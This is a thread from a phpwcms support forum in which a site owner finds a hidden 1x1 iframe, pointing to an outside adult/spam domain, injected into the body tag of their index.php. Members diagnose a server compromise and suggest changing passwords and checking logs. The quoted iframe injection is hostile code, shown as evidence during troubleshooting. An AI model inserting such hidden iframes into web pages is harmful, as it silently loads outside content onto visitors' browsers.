Spyware?!

Get help with installation and running phpwcms here. Please do not post bug reports or feature requests here.
Post Reply
cczfury
Posts: 11
Joined: Sun 23. Nov 2003, 10:42

Spyware?!

Post by cczfury »

I don't know if it has anything to do, but now whenever I load a phpwcms PHP page my browser starts loading ****... I checked the source code and I found the following piece of code :o
<IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
if you will check http://www.winarea.com/php/index.php at least for me it loads this **** (I use phpwcms, though I haven't configured it fully).

I will now run a spyware check to see if it's my computer, but I haven't gone anywhere strange :?
cczfury
Posts: 11
Joined: Sun 23. Nov 2003, 10:42

UPDATE

Post by cczfury »

I just checked the index.php inside the FTP server and found the following:
<body<?php echo $content["body"] ?><IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>>
I hope this didn't come with Phpwcms :?, but it is now in my php code. The only other reason I can find is that my host embedded it but that is not too probable...

Please answer me
cczfury
Posts: 11
Joined: Sun 23. Nov 2003, 10:42

DRAT

Post by cczfury »

All the PHP functionality in my host has been lost :shock:

All I get are errors each time a php page is loaded :oops:
Warning: mysql_pconnect(): Too many connections in /home/winarea/public_html/php/include/inc_lib/default.inc.php on line 25
Error while trying to connect to localhost
Pappnase

Post by Pappnase »

hello

if this server is yours than you have a problem!
i get this f*** also in the root, http://www.winarea.com!

so it has nothing to do with phpwcms!
Jan212
Posts: 859
Joined: Wed 28. Jan 2004, 21:38
Location: Solingen
Contact:

Post by Jan212 »

OH NO - that sounds not good. look in your apache log, i think your server is hacked... :oops:
you have to change all passwords immediatly (root etc.), but save the log... somebody has your db passes and admin access to phpwcms backend. :cry:
go to phpmyadmin and see the logs and process listing there - make a screenshot and post it...
go to google and search for a hack attack that could be run on your server and do all steps to make it safe... otherwise your server would be a server which send 60000 spam mails a day i think.
Regards/ Grüsse/ Groetjes - JAN212
------------------------------------------------
null212 - Büro für Kommunikation und Design
------------------------------------------------
Lyrikfetzen des Tages
1. Ist der Quelltext auch valide fragt Herr Müller ganz perfide.
2. Wat is dat een lekker ding.
3. Wer Vision hat soll zum Arzt gehen.
------------------------------------------------
Pappnase

Post by Pappnase »

Jan212 wrote:OH NO - that sounds not good. look in your apache log, i think your server is hacked... :oops:
you have to change all passwords immediatly (root etc.), but save the log... somebody has your db passes and admin access to phpwcms backend. :cry:
go to phpmyadmin and see the logs and process listing there - make a screenshot and post it...
go to google and search for a hack attack that could be run on your server and do all steps to make it safe... otherwise your server would be a server which send 60000 spam mails a day i think.
thats the way i thought too! bur jan you find the better words!
cczfury
Posts: 11
Joined: Sun 23. Nov 2003, 10:42

..

Post by cczfury »

DA**!

I have been locked out completely from receiving mail or connecting by FTP. The control panel is down :cry: I have contacted my hosting service, I hope they can resolve it.

By the way, what was in the main page, Pappnase? I find it weird that someone would hack into my website though... Plus, they even changed PHP code of phpwcms :x
ionrock
Posts: 279
Joined: Fri 20. Feb 2004, 17:04

Post by ionrock »

You should check out what other domains are hosted by your hosting company if possible. It sounds like unless they specifically got access to your site they would have just looked for any index.* file and changed the body tag as you described. At least you may be able to see if you were singled out or whether it is your hosting company. Good Luck
Pappnase

Re: ..

Post by Pappnase »

cczfury wrote:DA**!

I have been locked out completely from receiving mail or connecting by FTP. The control panel is down :cry: I have contacted my hosting service, I hope they can resolve it.

By the way, what was in the main page, Pappnase? I find it weird that someone would hack into my website though... Plus, they even changed PHP code of phpwcms :x
I mean that the same pron code is calling at the main page!
User avatar
pSouper
Posts: 1552
Joined: Tue 11. Nov 2003, 15:45
Location: London
Contact:

Post by pSouper »

Sheeesh! Free **** and you moaning :)

If at all possible change your server - they seem to be less than adequate for today's internet environment. if a server can't protect you and your code from attack they are not ding what you pay for (if it is free service you still paying too much :lol:)
Jan212
Posts: 859
Joined: Wed 28. Jan 2004, 21:38
Location: Solingen
Contact:

Post by Jan212 »

have you changed all passes of the current phpwcms version, your db and ftp? otherwise you'll never get this problem managed.
Regards/ Grüsse/ Groetjes - JAN212
------------------------------------------------
null212 - Büro für Kommunikation und Design
------------------------------------------------
Lyrikfetzen des Tages
1. Ist der Quelltext auch valide fragt Herr Müller ganz perfide.
2. Wat is dat een lekker ding.
3. Wer Vision hat soll zum Arzt gehen.
------------------------------------------------
Post Reply